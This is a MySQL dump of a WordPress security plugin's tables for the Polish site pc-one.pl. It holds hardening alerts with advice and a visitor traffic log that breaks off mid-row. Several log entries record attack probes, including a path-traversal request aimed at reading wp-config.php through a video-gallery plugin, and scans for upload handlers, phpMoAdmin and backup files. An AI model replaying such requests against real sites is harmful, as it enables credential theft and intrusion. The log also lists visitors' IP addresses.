-- MySQL dump 10.13 Distrib 5.1.73, for debian-linux-gnu (x86_64) -- -- Host: localhost Database: c3pco -- ------------------------------------------------------ -- Server version 5.1.73-1 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `w__wsd_plugin_alerts` -- DROP TABLE IF EXISTS `w__wsd_plugin_alerts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w__wsd_plugin_alerts` ( `alertId` int(10) unsigned NOT NULL AUTO_INCREMENT, `alertType` tinyint(4) NOT NULL DEFAULT '0', `alertSeverity` int(11) NOT NULL DEFAULT '0', `alertActionName` varchar(255) NOT NULL, `alertTitle` varchar(255) NOT NULL, `alertDescription` text NOT NULL, `alertSolution` text NOT NULL, `alertDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `alertFirstSeen` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`alertId`), UNIQUE KEY `alertId_UNIQUE` (`alertId`) ) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w__wsd_plugin_alerts` -- LOCK TABLES `w__wsd_plugin_alerts` WRITE; /*!40000 ALTER TABLE `w__wsd_plugin_alerts` DISABLE KEYS */; INSERT INTO `w__wsd_plugin_alerts` VALUES (1,0,3,'fix_wp_version_hidden','WordPress version is displayed for all users','

Displaying your WordPress version on frontend and in the backend\'s footer to all visitors\r\n and users of your website is a security risk because if a hacker knows which version of WordPress a website is running, it can make it easier for him to target a known WordPress security issue.

','

This plugin can automatically hide your WordPress version from frontend, backend and rss feeds if the option \"Hide WordPress version for all users but administrators\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(2,0,3,'fix_wp_generators_frontend','WordPress meta tags are displayed on frontend to all users','

By default, WordPress creates a few meta tags, among which is the currently installed version, that give a hacker the knowledge about your WordPress installation. At the moment, these meta tags are available for anyone to see, which is a potentially security risk.

','

This plugin can automatically hide your WordPress\'s default meta tags if the option \"Remove various meta tags generators from the blog\'s head tag for non-administrators\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(3,0,0,'fix_wp_rsd_frontend','WordPress Really Simple Discovery tag is displayed on frontend to all users','

By default, WordPress creates the rsd meta tag to allow bloggers to consume services like Flickr using the XML-RPC protocol.\r\n If you don\'t use such services it is recommended to hide this meta tag.

','

This plugin can automatically hide the rsd meta tag if the option \"Remove Really Simple Discovery meta tags from front-end\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(4,0,2,'fix_wp_wlw_frontend','WordPress Windows Live Writer tag is displayed on frontend for all users','

By default, WordPress creates the wlw meta tag to allow bloggers to publish their articles using the \"Windows Live Writer\" application.\r\n It is recommended to hide this meta tag from all visitors. If the option \"Remove Windows Live Writer meta tags from front-end\" is checked on the plugin\'s settings page, this meta tag\r\n will still be available for administrator users to use the \"Windows Live Writer\" application to publish their blog posts.

','

This plugin can automatically hide the wlw meta tag if the option \"Remove Windows Live Writer meta tags from front-end\"\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(5,0,3,'fix_wp_error_reporting','The check for PHP and database error reporting is disabled','

By default, WordPress hides database errors, but there are times when a plugin might enable them thus it is very important to have this type of errors turned off\r\n so if there is an error during a connection to the database the user will not get access to the error message generated during that request.

\r\n

As regarding the PHP errors, with the display_error PHP configuration directive enabled, untrusted sources can see detailed web application environment\r\n error messages which include sensitive information that can be used to craft further attacks.

\r\n

Attackers will do anything to collect information in order to design their attack in a more sophisticated way to eventually hack your website or web application, and causing\r\n errors to display is a common starting point. Website errors can always occur, but they should be suppressed from being displayed back to the public.

\r\n

Therefore we highly recommend you to have the \"Disable error reporting (php + db) for all but administrators\" option checked on the plugin\'s settings page to ensure PHP and\r\n database errors will be hidden from all users. For more information, please check the following article.

','

This plugin can do this automatically if the option \"Disable error reporting (php + db) for all but administrators\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(6,0,3,'fix_wp_core_update_notif','Core update notifications are displayed to all users','

These notifications are displayed at the top of the screen by the WordPress platform whenever the website was updated or needs an update.

\r\n

These notifications should only be viewed by the website\'s administrators and not visible to any other users registered with that website.

','

This plugin can automatically hide these notifications if the option \"Remove core update notifications from back-end for all but administrators\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(7,0,2,'fix_wp_plugins_update_notif','Plugins update notifications are displayed to all users','

These notifications are displayed at the top of the screen by the WordPress platform whenever the blog administrator\r\n needs to be informed about an available update for a plugin.

\r\n

These notifications should only be viewed by the website\'s administrators and not visible to any other users registered with that website.

','

This plugin can automatically hide these notifications if the option \"Remove plug-ins update notifications from back-end\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(8,0,0,'fix_wp_themes_update_notif','Themes update notifications are displayed to all users.','

These notifications are displayed at the top of the screen by the WordPress platform whenever the blog administrator\r\n needs to be informed about an available update for a theme.

\r\n

These notifications should only be viewed by the website\'s administrators and not visible to any other users registered with that website.

','

This plugin can automatically hide these notifications if the option \"Remove themes update notifications from back-end\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(9,0,2,'fix_wp_login_errors','WordPress login errors are displayed.','

Every time a failed login is encountered, the WordPress platform generates an error message that is displayed to the user.\r\n This is a potential security risk because it let\'s the user know of his mistake (be it a wrong user name or password) thus making your\r\n WordPress website more vulnerable to attacks.

\r\n

We strongly recommend you to hide these login error messages from all users to ensure a better security of your blog.

','

This plugin can automatically hide these notifications if the option \"Remove login error notifications from front-end\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(10,0,2,'fix_wp_admin_notices','WordPress admin notifications are displayed to all users.','

These notifications are displayed at the top of the screen by the WordPress platform whenever the blog administrator\r\n needs to be informed about an event that has occurred inside WordPress, it could be about an available update for the\r\n WordPress platform, a plugin or a theme that was updated or needs an update or to be configured, etc.

\r\n

These notifications should only be viewed by the website\'s administrators and not visible to any other users registered with that website.

','

This plugin can automatically hide these notifications if the option \"Hide admin notifications for non admins\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(11,0,2,'fix_wp_dir_listing','Directory listing check is disabled. This option should be enabled.','

A directory listing provides an attacker with the complete index of all the resources located inside of the directory.\r\n The specific risks and consequences vary depending on which files are listed and accessible.\r\n Therefore, it is important to protect your directories by having an empty index.php or index.htm file inside them.

','

This plugin can automatically create an empty index.php file in the following directories: wp-content, wp-content/plugins, wp-content/themes and wp-content/uploads if\r\n the option \"Try to create the index.php file in the wp-content, wp-content/plugins, wp-content/themes and wp-content/uploads directories to prevent directory listing\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(12,0,3,'fix_remove_wp_version_links','WordPress version is displayed in links for all users','

By default, WordPress will display the current version in links to javascript scripts or stylesheets.\r\n Therefore, if anyone has access to this information it might be a security risk because if a hacker knows which version of WordPress a website is running,\r\n it can make it easier for him to target a known WordPress security issue.

','

This plugin can automatically hide the WordPress version from links if the option \"Remove the version parameter from urls\" is checked on the plugin\'s settings page.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(13,0,2,'fix_empty_root_readme_file','Clearing the content of the \"readme.html\" file from the \"root\" directory is disabled.','

A default WordPress installation contains a readme.html file. This file is a simple html file that does not contain executable content that can be exploited by hackers or malicious users.\r\n Still, this file can provide hackers the version of your WordPress installation, therefore it is important to either delete this file or make it inaccessible for your visitors.

','

This plugin can automatically delete its content (assuming the file exists) if the option \"Empty the content of the readme.html file from the root directory\" is checked on the plugin\'s settings page.\r\n You can also delete this file manually by connecting to your website through an FTP connection.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(14,0,0,'check_table_prefix','The default WordPress database prefix is not used','

The majority of reported WordPress database security attacks were performed by exploiting SQL Injection vulnerabilities.\r\n By renaming the WordPress database table prefixes you are securing your WordPress blog and website from zero day SQL injections attacks.

\r\n

Therefore by renaming the WordPress database table prefixes, you are automatically enforcing your WordPress database security against such dangerous attacks because the attacker would not be able to guess the table names.

','','2016-09-01 16:32:26','2015-03-17 15:02:50'),(15,0,3,'check_wp_current_version','An updated version of WordPress is available: 4.6','

The latest WordPress version is usually more stable and secure, and is only released to include new features or fix technical and WordPress security bugs;\r\n making it an important part of your website administration to keep up to date since some fixes might resolve security issues.

\r\n

Running an older WordPress version could put your blog security at risk, allowing a hacker to exploit known vulnerabilities for your specific version and take full control over your web server.

','

It is recommended to update your WordPress installation as soon as possible. More information on updating WordPress manually and automatically\r\n can be found on the official WordPress site.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(16,0,0,'check_index_wp_content','The \"index.php\" file was found in the \"/wp-content\" directory','

A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.

\r\n

Therefore, it is important to protect your directories by having an empty index.php or index.htm file inside them.

','','2016-09-01 16:32:26','2015-03-17 15:02:50'),(17,0,0,'check_index_wp_plugins','The \"index.php\" file was found in the \"/wp-content/plugins\" directory','

A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.

\r\n

Therefore, it is important to protect your directories by having an empty index.php or index.htm file inside them.

','','2016-09-01 16:32:26','2015-03-17 15:02:50'),(18,0,0,'check_index_wp_themes','The \"index.php\" file was found in the \"/wp-content/themes\" directory','

A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.

\r\n

Therefore, it is important to protect your directories by having an empty index.php or index.htm file inside them.

','','2016-09-01 16:32:26','2015-03-17 15:02:50'),(19,0,2,'check_htaccess_wp_admin','The \".htaccess\" file was not found in the \"wp-admin\" directory','

An .htaccess file is a configuration file which provides the ability to specify configuration settings for a specific directory in a website.\r\n The .htaccess file can include one or more configuration settings which apply only for the directory in which the .htaccess file has been placed.\r\n So while web servers have their own main configuration settings file, the .htaccess file can be used to override their main configuration settings.

','

Please refer to this article for more information on how to create an .htaccess file.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(20,0,2,'check_readme_wp_root','The readme.html file was found in the root directory','

A default WordPress installation contains a readme.html file.\r\n This file is a simple html file that does not contain executable content that can be exploited by hackers or malicious users.\r\n Still, this file can provide hackers the version of your WordPress installation, therefore it is important to either delete this file or make it inaccessible for your visitors.

','

This plugin can automatically delete its content if the option \"Empty the content of the readme.html file from the root directory.\" is checked on the plugin\'s settings page.\r\n You can also delete this file manually by connecting to your website through an FTP connection.

','2016-09-01 16:32:26','2015-03-17 15:02:50'),(21,0,0,'check_username_admin ','User \"admin\" (with administrative rights) was not found','

One well known and dangerous WordPress security vulnerability is User Enumeration, in which a\r\n malicious user is able to enumerate a valid WordPress user account to launch a brute force attack against it.\r\n In order to help deter this type of attack, it is important not to have the default WordPress administrator\r\n username enabled on your blog.

','','2016-09-01 16:32:26','2015-03-17 15:02:52'); /*!40000 ALTER TABLE `w__wsd_plugin_alerts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w__wsd_plugin_live_traffic` -- DROP TABLE IF EXISTS `w__wsd_plugin_live_traffic`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w__wsd_plugin_live_traffic` ( `entryId` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `entryTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `entryIp` text, `entryReferrer` text, `entryUA` text, `entryRequestedUrl` text, PRIMARY KEY (`entryId`) ) ENGINE=MyISAM AUTO_INCREMENT=97085 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w__wsd_plugin_live_traffic` -- LOCK TABLES `w__wsd_plugin_live_traffic` WRITE; /*!40000 ALTER TABLE `w__wsd_plugin_live_traffic` DISABLE KEYS */; INSERT INTO `w__wsd_plugin_live_traffic` VALUES (96900,'2016-02-17 22:27:02','91.200.12.24','http://www.pc-one.pl/wp-content/plugins/reflex-gallery/readme.txt','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/'),(96898,'2016-02-17 21:33:49','202.46.54.95','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96903,'2016-02-17 22:46:20','80.242.34.105','http://www.pc-one.pl/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltoimage Safari/534.34','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96891,'2016-02-17 16:28:17','91.212.124.146','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3','http://pc-one.pl/wp-login.php'),(96895,'2016-02-17 18:31:47','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/category/bez-kategorii/'),(96890,'2016-02-17 15:36:01','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(96940,'2016-02-19 00:31:23','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96937,'2016-02-18 22:34:06','205.186.172.16','','Mozilla/5.0 (Windows NT 6.0; rv:16.0) Firefox/12.0','http://www.pc-one.pl/'),(96938,'2016-02-18 22:34:07','205.186.172.16','','Mozilla/5.0 (Windows NT 6.0; rv:16.0) Firefox/12.0','http://www.pc-one.pl/wp-includes/upgrade/theme-compat/popup-pomo.php'),(96939,'2016-02-18 22:34:07','205.186.172.16','','Mozilla/5.0 (Windows NT 6.0; rv:16.0) Firefox/12.0','http://www.pc-one.pl/'),(96956,'2016-02-19 06:42:54','199.187.122.91','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://pc-one.pl/robots.txt'),(96950,'2016-02-19 04:53:30','77.75.77.62','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/sitemap-pt-post-2011-04.xml.gz'),(96951,'2016-02-19 05:46:16','77.75.79.119','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96936,'2016-02-18 22:34:05','205.186.172.16','','Mozilla/5.0 (Windows NT 6.0; rv:16.0) Firefox/12.0','http://www.pc-one.pl/wp-content/upgrade/theme-compat/popup-pomo.php'),(96935,'2016-02-18 20:45:32','91.200.12.24','http://www.pc-one.pl/wp-content/themes/rayoflight-theme/functions/upload-handler.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/'),(96942,'2016-02-19 01:30:39','203.133.168.10','','Mozilla/5.0 (compatible; MSIE or Firefox mutant;) Daum 4.1','http://pc-one.pl/'),(96955,'2016-02-19 06:16:25','66.249.66.141','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/'),(96949,'2016-02-19 04:53:29','77.75.77.62','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96947,'2016-02-19 04:33:07','37.229.45.201','','Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.pc-one.pl/wp-login.php'),(96963,'2016-02-19 17:29:57','66.249.66.134','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/sitemap.xml'),(96958,'2016-02-19 08:36:18','31.207.154.254','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0','http://pc-one.pl/wp-login.php'),(96988,'2016-02-26 18:31:32','192.243.55.135','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/feed'),(96987,'2016-02-26 18:27:52','192.243.55.133','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/feed/'),(97000,'2016-03-04 04:31:10','202.46.57.183','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97001,'2016-03-04 12:24:45','202.46.58.121','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97022,'2016-03-11 22:09:45','202.46.52.166','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/feed/'),(96746,'2016-02-15 09:00:15','66.249.64.86','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/'),(96747,'2016-02-15 09:09:43','82.145.72.245','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://pc-one.pl/'),(96733,'2016-02-15 06:18:24','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-indeks.php'),(96725,'2016-02-15 00:27:45','207.46.13.16','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96720,'2016-02-14 22:52:30','178.162.222.228','http://pizza-imperia.com/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://pc-one.pl/'),(96708,'2016-02-14 07:18:17','5.9.9.4','http://o00.in','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96707,'2016-02-14 07:18:17','5.9.9.4','http://o00.in','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://www.pc-one.pl/'),(96704,'2016-02-14 05:32:19','207.46.13.140','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96712,'2016-02-14 09:52:14','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/category/bez-kategorii/'),(96714,'2016-02-14 10:04:14','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96715,'2016-02-14 12:02:52','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/robots.txt'),(96706,'2016-02-14 07:18:16','5.9.9.4','http://o00.in','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://pc-one.pl/'),(96721,'2016-02-14 22:52:34','193.90.12.90','http://pizza-imperia.com/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://www.pc-one.pl/'),(96711,'2016-02-14 09:33:12','31.207.134.232','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0','http://www.pc-one.pl/'),(96776,'2016-02-15 22:13:24','95.32.70.153','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MRA 4.5 (build 01399); .NET CLR 1.1.4322)','http://pc-one.pl/configuration.bak'),(96724,'2016-02-15 00:17:52','101.226.166.232','http://www.pc-one.pl/o-nas/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; 360Spider(compatible; HaosouSpider; http://www.haosou.com/help/help_3_2.html)','http://www.pc-one.pl/o-nas/'),(96719,'2016-02-14 21:54:55','14.145.120.156','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)','http://www.pc-one.pl/'),(96718,'2016-02-14 14:35:06','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(96723,'2016-02-14 23:38:22','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/tworzenie-stron/'),(96722,'2016-02-14 22:53:28','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/robots.txt'),(96726,'2016-02-15 00:39:24','77.75.78.162','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96727,'2016-02-15 00:39:25','77.75.78.162','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/tworzenie-stron/'),(96761,'2016-02-15 15:33:46','157.55.39.93','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/tworzenie-stron/'),(96760,'2016-02-15 15:01:51','77.75.78.166','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/o-nas/'),(96758,'2016-02-15 13:55:52','46.229.164.98','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://pc-one.pl/robots.txt'),(96759,'2016-02-15 15:01:48','77.75.78.166','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96764,'2016-02-15 16:31:31','46.229.164.101','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/robots.txt'),(96768,'2016-02-15 17:11:43','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96769,'2016-02-15 20:31:12','202.142.105.151','http://www.pc-one.pl/phpMoAdmin/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/phpMoAdmin/moadmin.php'),(96773,'2016-02-15 20:32:03','202.142.105.151','http://www.pc-one.pl/admin/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/admin/moadmin.php'),(96774,'2016-02-15 20:32:16','202.142.105.151','http://www.pc-one.pl/tools/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/tools/moadmin.php'),(96775,'2016-02-15 20:32:28','202.142.105.151','http://www.pc-one.pl/scripts/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/scripts/moadmin.php'),(96772,'2016-02-15 20:31:51','202.142.105.151','http://www.pc-one.pl/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/moadmin.php'),(96771,'2016-02-15 20:31:39','202.142.105.151','http://www.pc-one.pl/moadmin/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/moadmin/moadmin.php'),(96770,'2016-02-15 20:31:25','202.142.105.151','http://www.pc-one.pl/moadmin.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)','http://www.pc-one.pl/moadmin.php'),(96767,'2016-02-15 16:49:39','77.75.78.163','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/'),(96837,'2016-02-16 20:36:43','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96819,'2016-02-16 17:37:51','66.249.78.99','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/robots.txt'),(96833,'2016-02-16 20:36:36','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/tworzenie-stron/'),(96814,'2016-02-16 15:39:51','93.159.230.28','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)','http://pc-one.pl/'),(96801,'2016-02-16 07:30:26','207.46.13.25','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96800,'2016-02-16 07:29:23','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/feed/'),(96812,'2016-02-16 15:37:01','79.143.85.7','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://pc-one.pl/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php'),(96808,'2016-02-16 13:05:09','192.200.31.2','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.52','http://pc-one.pl/wp-content/themes/u-design/scripts/script.js'),(96807,'2016-02-16 10:05:46','202.46.49.143','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96810,'2016-02-16 14:45:51','91.200.12.24','http://www.pc-one.pl/wp-content/themes/radial-theme/functions/upload-handler.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/wp-content/themes/radial-theme/functions/upload-handler.php'),(96836,'2016-02-16 20:36:41','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96835,'2016-02-16 20:36:40','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96813,'2016-02-16 15:37:02','79.143.85.7','http://pc-one.pl/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://www.pc-one.pl/'),(96811,'2016-02-16 14:45:51','91.200.12.24','http://www.pc-one.pl/wp-content/themes/radial-theme/functions/upload-handler.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/'),(96834,'2016-02-16 20:36:38','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96827,'2016-02-16 20:22:37','207.46.13.25','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://pc-one.pl/pc-one-realizacje.html'),(96828,'2016-02-16 20:36:24','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/robots.txt'),(96826,'2016-02-16 20:22:14','207.46.13.25','','Mozilla/5.0 